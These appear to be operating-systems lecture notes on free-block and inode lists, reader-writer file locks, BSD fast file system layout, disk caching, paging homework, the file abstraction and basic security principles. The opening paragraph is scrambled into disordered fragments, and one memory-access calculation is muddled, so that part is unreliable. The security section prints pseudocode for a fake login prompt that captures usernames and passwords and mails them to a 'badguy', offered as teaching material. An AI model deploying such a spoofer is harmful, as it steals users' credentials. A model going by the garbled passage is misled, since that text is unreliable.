numbers. Copy this disk block into the superblock's free disk block list. When OS wants to allocate an inode. it first looks in the inode cache.o the size of the file system o number of free blocks in the file system o list of free blocks available in the file system o index of next free block in free block list o the size of the inode list o the number of free inodes in the file system o a cache of free inodes o the index of the next free inode in inode cache • • The kernel maintains the superblock in memory. Keep track of where stopped looking . If there is room in the superblock's disk block. An inode is free if its type field is 0. don't do anything much. To allocate a disk block. push it on there. cannot with disk block . The list consists of a sequence of disk blocks. inodes aren't large enough to store lots of inode numbers. If there is only one number left. o Easy to store lots of free disk block numbers in one disk block. it just decrements index. and periodically writes it back to disk. Why is this? o Kernel can determine whether inode is free or not just by looking at it. When the OS allocates an inode.

• Synchronizing multiple file accesses. What should the correct semantics be for concurrent reads and writes to the same file? Reads and writes should be atomic:
  o If a read executes concurrently with a write, the read should either observe the entire write or none of the write.
  o Reads can execute concurrently with no atomicity constraints.
• How to implement these atomicity constraints? Implement reader-writer locks for each open file. Here are the operations:
  o Acquire read lock: blocks until no other process has a write lock, then increments the read lock count and returns.
  o Release read lock: decrements the read lock count.
  o Acquire write lock: blocks until no other process has a write or read lock, then sets the write lock flag and returns.
  o Release write lock: clears the write lock flag.
• Obtain read or write locks inside the kernel's system call handler. On a Read system call, obtain the read lock, perform all file operations required to read in the appropriate part of the file, then release the read lock and return. On a Write system call, do something similar, except get write locks.
• How to organize the synchronization? Have a global file table in addition to the local (per-process) file tables. What does each file table do?
  o Global file table: indexed by some global file id - the inode index would work, for example. Each entry has a reader/writer lock, a count of the number of processes that have the file open, and a bit that says whether or not to delete the file when the last process that has the file open closes it.
  o Local file table: indexed by the open file id for that process. Has a pointer to the current position in the open file to start reading from or writing to for Read and Write operations. May have other data depending on what other functionality the file system supports.
• What about Create, Open, Close and Delete calls? If multiple processes have a file open, and a process calls Delete on that file, all processes must close the file before it is actually deleted. Yet another form of synchronization is required.
• For your Nachos assignments, you do not have to implement reader/writer locks - you can just use a simple mutual exclusion lock.
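For reference, the four lock operations above look roughly like this when sketched with POSIX threads primitives (inside a kernel you would build them from your own mutex and condition variables instead; initialize the fields with pthread_mutex_init and pthread_cond_init before use):

#include <pthread.h>

typedef struct {
    pthread_mutex_t m;
    pthread_cond_t  ok;
    int readers;    /* read lock count */
    int writing;    /* write lock flag */
} FileLock;

void acquire_read(FileLock *l) {
    pthread_mutex_lock(&l->m);
    while (l->writing)                 /* wait until no write lock */
        pthread_cond_wait(&l->ok, &l->m);
    l->readers++;
    pthread_mutex_unlock(&l->m);
}

void release_read(FileLock *l) {
    pthread_mutex_lock(&l->m);
    if (--l->readers == 0)
        pthread_cond_broadcast(&l->ok);
    pthread_mutex_unlock(&l->m);
}

void acquire_write(FileLock *l) {
    pthread_mutex_lock(&l->m);
    while (l->writing || l->readers)   /* wait until no lock at all */
        pthread_cond_wait(&l->ok, &l->m);
    l->writing = 1;
    pthread_mutex_unlock(&l->m);
}

void release_write(FileLock *l) {
    pthread_mutex_lock(&l->m);
    l->writing = 0;
    pthread_cond_broadcast(&l->ok);
    pthread_mutex_unlock(&l->m);
}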

• What are the sources of inefficiency in this file system? There are two kinds - wasted time and wasted space.
• Wasted time comes from waiting to access the disk. The basic problem with the system described above: it scatters related items all around the disk.
  o Inodes are separated from files.
  o Inodes in the same directory may be scattered around in inode space.
  o Disk blocks that store one file are scattered around the disk.
  So, the system may spend all of its time moving the disk heads and waiting for the disk to revolve.
• Just how bad is it? Well, in traditional Unix, the disk block size equaled the sector size, which was 512 bytes. When they went from 3BSD to 4.0BSD they doubled the disk block size. This more than doubled the disk performance. Two factors:
  o Each block access fetched twice as much data, so it amortized the disk seek overhead over more data.
  o The file blocks were bigger, so more files fit into the direct section of the inode index.
• But still pretty bad. The initial layout attempts to minimize these phenomena by setting up the free lists so that they allocate consecutive disk blocks for new files; when the file system is first created, files tend to be consecutive on disk. But as the file system is used, the layout gets scrambled: the free list order becomes increasingly randomized, and the disk blocks for files get spread all over the disk.
• Did some measurements on a file system at Berkeley. When the file system was first created, it got transfer rates of up to 175 KByte per second. After a few weeks, it deteriorated down to 30 KByte per second. What is worse, this is only about 4 percent (!!!!) of maximum disk throughput. So, the obvious fix is to make the block size even bigger.
• Wasted space comes from internal fragmentation: if the file size is not an even multiple of the disk block size, there will be wasted space off the end of the last disk block in the file. Each file with anything in it (even small ones) takes up at least one disk block. And, since most files are small, there may not be lots of full disk blocks in the middle of files. Just how bad is it? It gets worse for larger block sizes. Here are some numbers, giving the size and percentage of waste based on disk block size:

Space Used (Mbytes)   Percent Waste   Organization
 775.2                  0.0           Data only, no separation between files
 828.7                  6.9           Data + inodes, 512 byte block
 866.5                 11.8           Data + inodes, 1024 byte block
 948.5                 22.4           Data + inodes, 2048 byte block
1128.3                 45.6           Data + inodes, 4096 byte block

So, maybe making the block size bigger to get more of the disk transfer rate isn't such a good idea.

• Notice the problem: the presence of small files kills large file performance. Small files take up a full disk block, and large disk blocks waste space. If we only had large files, we would make the block size large and amortize the seek overhead down to some very small number.
• In 4.2BSD they attempted to fix some of these problems. They increased the block size: the minimum block size is now 4096 bytes. So, how to have large blocks but not waste a lot of space for small files? Solution: introduce the concept of a disk block fragment. Each disk block can be chopped up into 2, 4, or 8 fragments. Each file contains at most one fragment, which holds the last part of the data in the file; so, if you have 8 small files, they together occupy only one disk block. Can also allocate larger fragments if the end of the file is larger than one eighth of the disk block. When you increase the size of the file, you may need to copy out the last fragment if the size gets too big. So, you may copy a file multiple times as it grows. The Unix utilities try to avoid this problem by growing files a disk block at a time.
• They also introduced the concept of a cylinder group. A cylinder group is a set of adjacent cylinders, and a file system consists of a set of cylinder groups. Each cylinder group has a redundant copy of the super block, space for inodes and a bit map describing the available blocks in the cylinder group. The bit map is laid out at the granularity of fragments. Using a bitmap as the storage device makes it easier to find adjacent groups of blocks. Default policy: allocate 1 inode per 2048 bytes of space in the cylinder group.
• Basic idea behind cylinder groups: put related information together in the same cylinder group and unrelated information apart in different cylinder groups. Use a bunch of heuristics. Try to put all inodes for a given directory in the same cylinder group. Also try to put the blocks for one file adjacent in the cylinder group; this helps read bandwidth and write bandwidth for big files. For long files, redirect blocks to a new cylinder group every megabyte; this spreads stuff out over the disk at a large enough granularity to amortize the seek time.
• Important point to making this scheme work well - keep a free space reserve (5 to 10 percent). Once above this reserve, only the supervisor can allocate disk blocks. If the disk is almost completely full, the allocation scheme cannot keep related data together and degenerates to random.
• Bottom line: this helped a lot - read bandwidth went up to 43 percent of the peak disk transfer rate for large files.

• Another standard mechanism that can really help disk performance: a disk block cache. The OS maintains a cache of disk blocks in main memory, devoting part of main memory to cached data. When a request comes in, check to see if the appropriate disk blocks are in the cache; if they are, the request can be satisfied locally. When a file is read, its blocks are put into the disk block cache. With disk block caching, physical memory serves as a cache for the files stored on disk, just as with virtual memory it serves as a cache for processes stored on disk. This is part of almost any IO system in a modern machine, and can really help performance.
• Can use read-ahead to improve file system performance. Most files are accessed sequentially, so can optimistically prefetch the disk blocks ahead of the one that is being read. Prefetching is a general technique used to increase the performance of fetching data from long-latency devices: try to hide the latency by running something else concurrently with the fetch.
• With a disk block cache, one physical resource (memory) is shared by two parts of the system. How much of it should the file cache and the virtual memory subsystem each get?
  o Fixed allocation: each gets a fixed amount. Not flexible enough for all situations.
  o Adaptive: if you run an application that uses lots of files, give more space to the file cache; if you run applications that need more memory, give more to the virtual memory subsystem. Sun OS does this.
• What about the replacement policy? Have many of the same options as for paging algorithms: LRU, FIFO with second chance, etc. How easy is it to implement LRU for disk blocks? Pretty easy - the OS gets control every time a disk block is accessed, so it can implement an exact LRU algorithm easily (see the sketch below). Compare: how easy was it to implement an exact LRU algorithm for virtual memory pages? How easy was it to implement an approximate LRU algorithm? Bottom line: the different context makes different cache replacement policies appropriate for disk block caches.
• What is the bad case for all LRU algorithms? Sequential accesses. What is the common case for file access? Sequential accesses. How to fix this? Use free-behind for large sequentially accessed files - as soon as you finish reading one disk block and move to the next, eject the first disk block from the cache. So what cache replacement policy do you use? The best choice depends on how the file is accessed, so the policy choice is difficult because you may not know.
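A compact sketch of exact LRU for a disk block cache - workable here precisely because every block access goes through the OS. disk_read is a hypothetical routine that fills a buffer from disk:

#define NBUF   64
#define BSIZE  512

void disk_read(unsigned blockno, char *buf);   /* assumed: reads one block */

typedef struct {
    unsigned      blockno;
    unsigned long last_used;   /* logical clock value at last access */
    char          data[BSIZE];
} Buf;

static Buf cache[NBUF];        /* zero-initialized, so last_used == 0 */
static unsigned long clock_now;

/* Return the cached buffer for blockno, evicting the LRU buffer on a miss. */
char *get_block(unsigned blockno)
{
    Buf *victim = &cache[0];
    for (int i = 0; i < NBUF; i++) {
        if (cache[i].last_used != 0 && cache[i].blockno == blockno) {
            cache[i].last_used = ++clock_now;   /* hit: touch and return */
            return cache[i].data;
        }
        if (cache[i].last_used < victim->last_used)
            victim = &cache[i];                 /* track least recently used */
    }
    victim->blockno   = blockno;                /* miss: evict and reload */
    victim->last_used = ++clock_now;
    disk_read(blockno, victim->data);
    return victim->data;
}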

• How to handle writes? Can you avoid going to disk on writes? Possible answers:
  o No - the user wants the data on stable storage; that's why he wrote it to a file.
  o Yes - keep the data in memory for a short time before writing it back, which can get big performance improvements. Maybe the file is deleted in the meantime, so you never need to use the disk at all (especially useful for /tmp files). Or you can batch up lots of small writes into a larger write, or give the disk scheduler more flexibility.
  In general, the right answer depends on the needs of the system.
• One common problem with file caches: if the file system is used as the backing store for virtual memory, you can run into double caching - eject a page, and it gets written back to a file, whose disk blocks may then also be cached in memory in the file cache. Fix this by not caching backing store files; otherwise, file caching interferes with the performance of the virtual memory system.
• An important issue for file systems is crash recovery. Must maintain enough information on disk to recover from crashes. So, modifications must be carefully sequenced to leave the disk in a recoverable state at all times.

An old Homework problem

Consider a virtual memory system with 32 bit addresses and 8 KB pages. The entire 32 bit address space is available to processes. Each page table entry is 2 bytes long, and there is one level of page table. Consider a process that has allocated the top and bottom 128 MB of its address space. How much memory does its page table use? (Note that 1 MB = 1048576 bytes.)

Answer: Because each page is 8K, the offset takes up 13 bits, leaving 19 bits for the page identifier. There are 2^19 two-byte entries, which is 2^20 = 1048576 bytes (or 1 MB).

Now consider the same process in a two-level paging system with the same size pages, but with two page identifiers of 10 and 9 bits for the first and second levels of the page table. How much memory does this page table consume for the same process?

Answer: The first page table takes the same amount of space for all processes: one main page table of 2^10 two-byte entries, which takes up 2048 bytes (or 2 KB). Each secondary page table addresses 2^9 = 512 pages; because each page is 8K, each secondary page table addresses 4194304 bytes (4 MB) of data. Each 128 MB of allocated data therefore requires 32 secondary page tables, for a total of 64 secondary page tables, each of 2^9 two-byte entries (1024 bytes). The whole page table takes 2048 + 64 × 1024 = 67584 bytes, or about 68 KB.
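A quick check of that arithmetic in C:

#include <stdio.h>

int main(void)
{
    /* one level: 32-bit addresses, 13-bit offset -> 2^19 entries, 2 bytes each */
    long one_level = (1L << 19) * 2;
    /* two levels: 2^10 top-level entries + 64 secondary tables of 2^9 entries */
    long two_level = (1L << 10) * 2 + 64 * (1L << 9) * 2;
    printf("one level:  %ld bytes\n", one_level);   /* 1048576 (1 MB)   */
    printf("two levels: %ld bytes\n", two_level);   /* 67584 (about 68 KB) */
    return 0;
}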

Another old homework problem

Consider a virtual memory system with a hardware cache on the processor, main memory, and paging from disk. The layers are tried in order, and the hit rates and service times for the layers of the memory system are:

Caching level                              Hit Rate   Service Time
CPU Cache                                  90%        1 ns
Main Memory                                75%        10 ns
Page Fault (includes translation           100%       10 milliseconds
and retrieval)

Note that the service time for a layer is paid on a hit or a miss: the service time must be paid to determine that the item you want is not at this level. A main memory hit only occurs on a cache miss, so the time to serve a cache miss that hits in main memory is the service time of the cache plus the service time of the memory. What is the average service time of a memory access on this machine?

Answer: The absolute rates are:

Caching level   Total Hit Rate              Service Time
Cache           90%                         1 ns
Main Memory     (0.1 × 0.75) = 7.5%         10 ns
Page Fault      (0.1 × 0.25 × 1) = 2.5%     10 ms

So the average memory access time is:

access time = 0.9(1 × 10^-9) + 0.075(1 × 10^-9 + 10 × 10^-9)
              + 0.025(1 × 10^-9 + 10 × 10^-9 + 10 × 10^-3)
            = 1(1 × 10^-9) + 0.1(10 × 10^-9) + 0.025(10 × 10^-3)
            = 250.002 µs

Which improves memory performance more: improving the processor cache service time by 10% (a 0.9 ns lookup time), or increasing the main memory hit rate by 5% (to 80%) by choosing a better page replacement algorithm? Calculate the average memory access time for both changes.

Reducing the cache service time to 0.9 ns gives:

access time = 1(0.9 × 10^-9) + 0.1(10 × 10^-9) + 0.025(10 × 10^-3) = 250.0019 µs

Increasing the main memory hit rate to 80% gives:

access time = 1(1 × 10^-9) + 0.1(10 × 10^-9) + 0.08(1 × 10^-9 + 10 × 10^-9)
              + 0.02(10 × 10^-3) ≈ 200.002 µs

The better page replacement algorithm is the clear winner: the fraction of a nanosecond gained from the faster cache is nothing next to the 50 µs saved per access for the sake of the increased hit rate.

File Systems

File systems provide applications with permanent storage. More than that, they organize and protect data, and provide a clean interface to allow manipulation of that data. It's no exaggeration to say that providing a file system is one of the major services of general purpose operating systems, and of less general ones as well. (Even the palm pilot has permanent storage.)

Files

A file is a persistent, named, protected collection of bits, together with a collection of operations that can be executed on them. Persistence implies that the bytes have a meaning that extends in time. One wouldn't store the memory used in a computation in a file because it has no long-term use; memory used in calculating intermediate results doesn't have that attribute. By definition, files are stored on more permanent media. These days, the most common medium is still magnetic disk, although several others are making bids. Some other media that can contain files are memory, flash memory(1), CD-ROMs, tapes, and more esoteric media. Basically anything that can hold information permanently and be read by a computer has held a file system, or will eventually.

In general, files are largely medium-independent. The same operations are generally allowed on files regardless of the underlying storage medium, and code that manipulates files on one medium will work on others. This saves a lot of programmer time. There are obvious exceptions - you can write to a CD-ROM at most once, and there are obvious drawbacks to trying to move from a byte at the front of a tape to the back. The access operations generally impose an order on the bits.

Because the data in files has this long term significance, the file system has to impose ideas of user identity and related privileges on the data. Because files are outside memory, they are also outside the protection of the memory protection system(3).

Finally, file systems provide a way to name files. This is a seemingly simple function that turns out to be enormously powerful. Magicians and conjurers have long believed that to know a thing's name gives a person power over that thing; so it is with computers. Naming information and the operations thereon is the heart of computer science. Providing a name space outside the confines of memory addresses allows processes to share data and communicate. File systems provide ways to name files that span multiple media on the same machine (the UNIX® file system), loosely connected local area networks (the Network File System (NFS)) and even global name spaces (the Andrew File System (AFS)).

Despite the fairly simple idea of what a file is, the Devil is in the details, and files on different operating systems can be remarkably different, as we'll see. We'll discuss the variations in the file abstraction along the following axes:

• Naming
• Data Structure and Access Patterns
• File Types
• Attributes(2)
• Operations

1. Flash memory holds the data stored in it even when the power is off. So does core memory, but your generation will only see that in museums.
2. The attributes define what files are used for.

Naming

A file generally has a name, a string of bits that (usually) correspond to human-readable letters. The operating system defines what characters are valid in file names, and any equivalence classes between them.(4) Under UNIX the restraints are minor - filenames can't contain /.(5) UNIX allows any byte except hex 0x2f (ASCII for /) to appear in a filename. Compare this to MS-DOS (and the Windows\d\d systems that basically sit atop it), which requires an 8 character file name and a three character extension, and limits the character set to uppercase letters and a few symbols (letters are converted to uppercase in all file names). AmigaDOS allows you to specify any capitalization but internally ignores case, so "file", "File", and "FILE" all refer to the same file, although each will appear in directory listings spelled as the creator of the file spelled it.

Different operating systems depend to differing extents on the structure of file names. (Systems other than MS-DOS have the idea of an extension, or a naming convention for related files.) MS-DOS defines an executable file by its extension, while UNIX generally takes the extension as a hint. Other programs, like compilers, place varying degrees of emphasis on file names; for example gcc uses the file extension to determine which of the languages it supports should be used to compile the source file.

File Structure

In its simplest form, a file is a collection of ordered bytes, often called a flat file. Some systems, however, place additional structure on files, like Multics does. For example files under some operating systems consist of records, or collections of bytes, or of printer lines. The records can be fixed length or variable. Arranging a file as records implies the existence of a schema (or description of the record), either embedded in the file in a manner that the OS can read or kept separately in the system (perhaps elsewhere in the file system). Record-based files impose a structure on the data and allow the operating system to keep that structure intact. Record-based files may display an ordering that is independent of the way the bits are ordered on the underlying storage medium; the internal structure of the file may reflect this possibility and be significantly more complex than a flat file. We will discuss the details of this when we discuss the implementation of file systems.

Many people think of record-based files as database entries, and that's one common use of them. Another common type of record-based file was the card file - a file that was a sequence of 80 character records that was the electronic equivalent of a stack of punched cards. The flip-side is that record-based files are less flexible: translation between formats or adding a new format is frequently difficult, and rather than reading single bytes or seeking to arbitrary offsets, such files are always accessed in terms of records.

3. Even then, the initial permissions on the memory segments are derived from the files themselves.

Records are the fundamental building block of files in such systems, in the same way that bytes are the fundamental building blocks of flat files. I should note that record-based access is provided and enforced by the operating system; it is an OS feature, not a simulation by the application, and not merely an application convention (although many applications create the illusion of record-based files in a flat file system, of course; the sketch below shows how).

Related to the building blocks of a file is the access method that the file supports. The access methods are an abstraction of the underlying hardware. A file system that supports only sequential access requires all files to be read or written from the first byte to the last; such access methods are appropriate for files residing on a magnetic tape, for example. Record-based file systems cannot seek to a specific byte in the file, or ask for a set of bytes that spans a record boundary. Other access methods include read-only, for unmodifiable files, and indexed, for record-based files that have been sorted multiple ways (the OS must support that, of course; the read system calls then return the records in sorted order).

Note well the distinction between an application's access pattern and the access method allowed by the OS. An application may read a configuration file that supports random access sequentially: the operating system allows any access pattern, but the application chose to read the file sequentially. The reverse cannot be done; a file that supports only sequential access cannot have its bytes read in another order.
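Here is a minimal C sketch of that application-level illusion: "record" access layered on a flat UNIX file by computing byte offsets. The 80-byte record structure is hypothetical, echoing the card files mentioned earlier; a real application would pick a layout to suit its data.

    #include <stdio.h>

    struct record {            /* hypothetical 80-byte "card" record */
        char text[80];
    };

    /* Read record number n from a flat file; returns 1 on success.
     * The OS sees only bytes - the record structure is the
     * application's convention. */
    int read_record(FILE *f, long n, struct record *r)
    {
        if (fseek(f, n * (long)sizeof(struct record), SEEK_SET) != 0)
            return 0;
        return fread(r, sizeof(struct record), 1, f) == 1;
    }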

File Types

Files have various uses: they hold data for various programs, free-form text intended to be read by humans, programs themselves, and other things. File types can be an explicit piece of information remembered by the operating system (a file attribute; see below), or they can be a combination of name, permissions (another attribute; see below), and contents. How types are encoded in the system, and how rigidly type restrictions are enforced, control how type-based the file system is.

Older business computers, especially mainframes, had strongly-typed systems. Strongly-typed operating systems require file types to be encoded in every file; as a result, files generally have only one function. The advantage is that file use, and the procedures that operate on files, can be tightly constrained, and their use can be easily controlled. If files that can be printed as checks can only be created by a few trusted programs, forging a check becomes more difficult. It also makes creating such a file for a legitimate purpose that the system hasn't been programmed for more difficult.

Other general-purpose systems, like UNIX and Windows, rely on a combination of filenames, permissions, and file contents to provide typing, leaving the business of discriminating between data types to the applications that use them. These systems generally only care about determining whether a file is executable (that is, contains a program that can be run) or not; applications use similar criteria to differentiate among their own data types. Some operating systems allow the contents of a file to directly encode a file type. UNIX considers a file executable if the user has the right to execute the file encoded in the permissions and if the file is correctly formatted as an executable; formatting is generally checked by a magic number in the first few bytes of the file. (Check out the file command in UNIX for a list of some of the magic numbers used by modern versions of UNIX.) MS-DOS relies on the file extension and the internal format. How intrinsic types are in the file system is a tradeoff between codifying practices in the OS and allowing adaptability.

Permissions and Attributes

Permissions encode the operations allowable on a file and what users (more precisely, processes acting on behalf of users) are allowed to perform them. You can think of this as a list of all the possible operations on a file and, for each, the users allowed to perform it; in practice the representations are smaller and the listings less exhaustive. Consider the UNIX file permissions: each file has an owning user and group, and the rights to read, write, and execute the file are controlled for each of those entities and for other users. For example, a file might be readable and writable by its owner, readable by members of its group, and not accessible to other users. We will talk more about permissions in a few days; right now, the owner, group, and permissions are interesting as attributes of the file.

Attributes are meta-data: data about the file itself, not the data within it. Permissions are a good example: they control what processes may access the underlying data of the file, but are independent of that data. Some other common attributes are:

• creator
• owner
• system file flag
• hidden flag
• temporary flag
• creation time
• modification time
• information about the last backup
• lock information
• current size
• maximum size

Meta-data is used for a variety of reasons. Some of it is for internal OS use, for example the backup flags. Some of it is for human use: a data provenance. The ability of the file system to store both data and data about the data is an important aspect of the system; for example, the make utility would be useless without the meta-data telling the program the relative ages of the files. Meta-data is as valuable as the data it describes, and should therefore be protected.
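As a concrete example of reading attributes, here is a short C sketch using the POSIX stat() call, which returns exactly this kind of meta-data (owner, size, permissions, modification time). Error handling is abbreviated.

    #include <stdio.h>
    #include <sys/stat.h>

    /* Print a few attributes of a file; st_uid, st_size, st_mode and
     * st_mtime are standard members of struct stat. */
    int show_attributes(const char *path)
    {
        struct stat sb;
        if (stat(path, &sb) != 0)
            return -1;
        printf("owner uid: %ld\n", (long)sb.st_uid);
        printf("size: %lld bytes\n", (long long)sb.st_size);
        printf("mode: %o\n", (unsigned)sb.st_mode & 0777);
        printf("last modified: %ld\n", (long)sb.st_mtime);
        return 0;
    }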

File Operations

File operations are a generally simple and intuitive set of operations on files. Not all of them are supported by all file systems, and in some file systems certain operations are implemented in terms of other file operations; still, these give a good feel for what file operations are.

Create: Create a new file. This may allocate space for the file, or just reserve the name for future action. Depending on the file system, this may be an operation on the file or on a directory. Some operating systems use the existence of a file to start a service, so the existence of such a file is its most important attribute.

Delete: Delete an existing file. The ability to delete a file is distinct from (but often related to) the ability to modify its contents.

Open: This lets the OS know that the current process will be interested in a file soon. The OS may take this opportunity to predict future behavior, collect statistics, or do other support work in addition to bringing the data from secondary storage into the process's address space. (Your Nachos work should give you an idea about some of the OS setup work that's done here.) In some sense the operation is extraneous, but in cases where the file resides on a medium with significant startup cost (a robotic tape cabinet, say), not returning the open call until the file is ready for access is a good idea.

Close: Let the OS know that the process is done with this file and that the OS can reclaim the resources allocated to manipulating it. Some systems delay writes or cache data for future reads; close is an indication to them that pending writes must be flushed and that cached reads can be discarded.

Read: Get some data from the file. Reading occurs at the current byte/record.

Write: Write some data to the file. Strictly, this means changing existing data in the file to a new value, but many systems also use the write system call to append data: some OSes determine whether a write system call causes an append or an overwrite based on the current byte and the length of the buffer written. Writing occurs at the current byte/record. Like read, there may be secondary actions associated with this operation.

Append: Add data to the end of the file. This shares aspects with write, but includes the idea that the underlying file is changing size: append means that the OS must increase the allocation of storage to the file.

Seek: Files have a notion of the current byte (or record) of the file that will next be accessed. On files that can be randomly accessed, seek allows the calling process to set the current byte (or record).

Get/Set Attributes: For those attributes that can be modified directly by users, this provides access. (The data and meta-data are updated, for example the backup flag.)

Rename: Change the name of the file in the file system, the contents remaining in place.

Note that reading and writing may cache data, and that such caches have to be coordinated so that all processes see a consistent version of the file.
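The following minimal C sketch exercises several of these operations through the POSIX system call interface. The filename is made up and error handling is mostly omitted; it is an illustration of the operation sequence, not production code.

    #include <fcntl.h>
    #include <unistd.h>

    int demo(void)
    {
        char buf[5];
        /* create/open */
        int fd = open("demo.dat", O_RDWR | O_CREAT | O_TRUNC, 0644);
        if (fd < 0)
            return -1;
        write(fd, "hello", 5);      /* write at the current byte (0) */
        lseek(fd, 0, SEEK_SET);     /* seek back to the first byte */
        read(fd, buf, 5);           /* read at the current byte */
        close(fd);                  /* let the OS reclaim resources */
        return 0;
    }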

Putting Devices in the File System

The simple, powerful semantics of files lend themselves to controlling a variety of resources. Physical disk drives are a special type of file; so are terminals, modems, and printers. All of these can be accessed through the familiar file system interface. For example, terminal input can be thought of as a sequential read-only file, and terminal output as a sequential write-only file. This means that programs can be written to take an input and an output file, and transparently run either interactively or from disk files. Furthermore, by introducing memory-resident sequential files that are written by one process and read by another, called pipes, programs can be linked together in arbitrary ways. Recently, the data of running processes has been added to the list of data accessible through the file system. UNIX takes this to an extreme: nearly every OS resource has a file system interface.

Furthermore, the access control mechanisms of files can be directly applied to prevent unauthorized manipulations of the hardware: raw disk drives or modem devices can only be accessed by privileged users, and those accesses are controlled by the same system as file accesses. A unified access control system is easier to use, and having only one system to debug implies that it will be more secure.

All is not a bed of roses, though. The OS has to do extra work to make a terminal look like a file, and hardware has features that are not easily expressed as file operations. But the result is a simpler programming model for developers: I/O is file I/O.

Memory Mapping Files

As we discussed in the memory management unit, it is sometimes convenient to move a file into memory and access it directly there. The easiest way to do this is to make the file on disk (or whatever medium) the backing store for a segment (or a section of a paged VM space) and let the paging system handle the writes.

The big issue here is consistency: when do changes in memory get reflected to the file in secondary storage? The paging system is probably pretty lazy about getting changes out to a file, but writing a whole page to disk on every write to memory is probably too slow. One solution is to keep data about which files are memory mapped (as an attribute) and make the associated file reads go through the memory system rather than the file.
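A minimal sketch of memory-mapped file access using the POSIX mmap() interface appears below. msync() is the explicit way to force dirty pages back to secondary storage, which illustrates the consistency issue just described. Error handling is abbreviated, and a production program would check for a zero-length file.

    #include <fcntl.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <unistd.h>

    /* Map a file, modify it through memory, and push the changes out. */
    int touch_first_byte(const char *path)
    {
        int fd = open(path, O_RDWR);
        struct stat sb;
        if (fd < 0 || fstat(fd, &sb) != 0)
            return -1;
        char *p = mmap(NULL, sb.st_size, PROT_READ | PROT_WRITE,
                       MAP_SHARED, fd, 0);
        if (p == MAP_FAILED)
            return -1;
        p[0] = '#';                      /* an ordinary store; no write() call */
        msync(p, sb.st_size, MS_SYNC);   /* force dirty pages to the file */
        munmap(p, sb.st_size);
        close(fd);
        return 0;
    }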

CHAPTER 10

DIRECTORIES AND SECURITY

The terms protection and security are often used together, and the distinction between them is a bit blurred. Security is generally used in a broad sense to refer to all concerns about controlled access to facilities, while protection describes the specific technological mechanisms that support security.

As in any other area of software design, it is important to distinguish between policies and mechanisms. In short, before you can start building machinery to enforce policies, you need to establish what policies you are trying to enforce. Unfortunately, we don't have the space to go into the whole question of security policies here; we will just assume that terms like "authorized access" have some well-defined meaning in a particular context. The situation is analogous to the old saw that every program is correct according to some specification.

Many years ago, I heard a story about a software firm that was hired by a small savings and loan corporation to build a financial accounting system. The chief financial officer used the system to embezzle millions of dollars and fled the country. The losses were so great that the S&L went bankrupt, and the loss of the contract was so bad that the software company also went belly-up. Did the accounting system have a good or bad security design? The problem wasn't unauthorized access to information, but rather authorization to the wrong person.

Threats

Any discussion of security must begin with a discussion of threats. After all, if you don't know what you're afraid of, how are you going to defend against it? Threats are generally divided into three main categories:

• Unauthorized disclosure. A "bad guy" gets to see information he has no right to see (according to some policy that defines "bad guy" and "right to see").
• Unauthorized updates. The bad guy makes changes he has no right to make.
• Denial of service. The bad guy interferes with legitimate access by other users.

There is a wide spectrum of denial-of-service threats. At one end, the category overlaps with the previous one: a bad guy deleting a good guy's file could be considered an unauthorized update. At the other end, blowing up a computer with a hand grenade is not usually considered an unauthorized update, but it certainly denies service. As this second example illustrates, some denial-of-service threats can only be countered by physical security: no matter how well your OS is designed, it can't protect my files from his hand grenade. Another form of denial-of-service threat comes from unauthorized consumption of resources, such as filling up the disk, tying up the CPU with an infinite loop, or crashing the system by triggering some bug in the OS. While there are software defenses against these threats, they are generally considered in the context of other parts of the OS rather than of security and protection; discussions of software mechanisms for computer security generally focus on the first two threats.

In response to these threats, countermeasures also fall into various categories. As programmers, we tend to think of technological tricks, but it is also important to realize that a complete security design must involve physical components (such as locking the computer in a secure building with armed guards outside) and human components (such as a background check to make sure your CFO isn't a crook, or checking to make sure those armed guards aren't taking bribes).

Design Principles

1. Public Design. A common mistake is to try to keep a system secure by keeping its algorithms secret. That's a bad idea for many reasons. First, it gives a kind of all-or-nothing security: as soon as anybody learns about the algorithm, security is all gone. In the words of Benjamin Franklin, "Two people can keep a secret if one of them is dead." Second, it is usually not that hard to figure out the algorithm, by seeing how the system responds to various inputs, decompiling the code, etc. Third, publishing the algorithm can have beneficial effects. The bad guys have probably already figured out your algorithm and found its weak points; if you publish it, perhaps some good guys will notice bugs or loopholes and tell you about them so you can fix them.

The Trojan Horse

Break-in techniques come in numerous forms. One general category of attack that comes in a great variety of disguises is the Trojan Horse scam. The name comes from Greek mythology: the ancient Greeks were attacking the city of Troy, which was surrounded by an impenetrable wall. Unable to get in, they left a huge wooden horse outside the gates as a "gift" and pretended to sail away. The Trojans brought the horse into the city, where they discovered that the horse was filled with Greek soldiers who defeated the Trojans to win the Rose Bowl (oops, wrong story). In software, a Trojan Horse is a program that does something useful - or at least appears to do something useful - but also subverts security somehow. In the personal computer world, Trojan horses are often computer games infected with "viruses."

Here's the simplest Trojan Horse program I know of. Log onto a public terminal and start a program that does something like this:

    print("login:");
    name = readALine();
    turnOffEchoing();
    print("password:");
    passwd = readALine();
    sendMail("badguy", name, passwd);
    print("login incorrect");
    exit();

A user walking up to the terminal will think it is idle. He will attempt to log in, typing his login name and password. The Trojan Horse program sends this information to the bad guy, prints the message login incorrect, and exits. After the program exits, the system will generate a legitimate login: message, and the user, thinking he mistyped his password (a common occurrence because the password is not echoed), will try again, log in successfully, and have no suspicion that anything was wrong. Note that the Trojan Horse program doesn't actually have to do anything useful; it just has to appear to.

2. Default = No Access. Start out by granting as little access as possible and add privileges only as needed. If you forget to grant access where it is legitimately needed, you'll soon find out about it; users seldom complain about having too much access.

3. Timely Checks. Checks tend to "wear out." For example, the longer you use the same password, the higher the likelihood it will be stolen or deciphered. Be careful: this principle can be overdone. Systems that force users to change passwords frequently encourage them to use particularly bad ones.

4. Minimum Privilege. A person (or program or process) should be given just enough powers to get the job done. This is an extension of point 2. In other contexts, this principle is called "need to know." It implies that the protection mechanism has to support fine-grained control.

5. Simple, Uniform Mechanisms. Any piece of software should be as simple as possible (but no simpler!) to maximize the chances that it is correctly and efficiently implemented. This is particularly important for protection software, since bugs are likely to be usable as security loopholes. It is also important that the interface to the protection mechanisms be simple, easy to understand, and easy to use. It is remarkably hard to design good, foolproof security policies; policy designers need all the help they can get.

